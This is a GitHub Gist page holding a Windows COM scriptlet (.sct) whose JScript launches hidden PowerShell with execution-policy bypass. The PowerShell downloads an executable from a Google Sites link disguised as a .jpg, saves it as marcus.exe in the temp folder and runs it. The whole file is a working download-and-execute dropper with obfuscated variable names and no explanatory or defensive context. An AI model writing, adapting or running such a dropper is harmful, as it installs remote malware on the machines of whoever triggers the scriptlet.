Created
August 5, 2017 17:37
-
-
Save Elm0D/f746627ff0675ef75ddae12af4ddcc2c to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="FofX" | |
| progid="FofX" | |
| version="1.00" | |
| classid="{00001111-0000-0000-0000-0000FEEDACDC}" | |
| > | |
| <script language="JScript"> | |
| <![CDATA[ | |
| var EGu = new ActiveXObject("WScript.Shell"); | |
| var WszDO = "$down = New-Object System.Net.WebClient;$url = 'https://sites.google.com/site/elm0d4upload/documents/VB6%20TestMsgBox.jpg?attredirects=0&d=1';$file = '%TMP%\\marcus.exe';$down.DownloadFile($url,$file);$exec = New-Object -com shell.application;$exec.shellexecute($file);exit;"; | |
| var zH = 'powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -command '; | |
| EGu.Exec(zH + WszDO); | |
| ]]> | |
| </script> | |
| </registration> | |
| </scriptlet> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment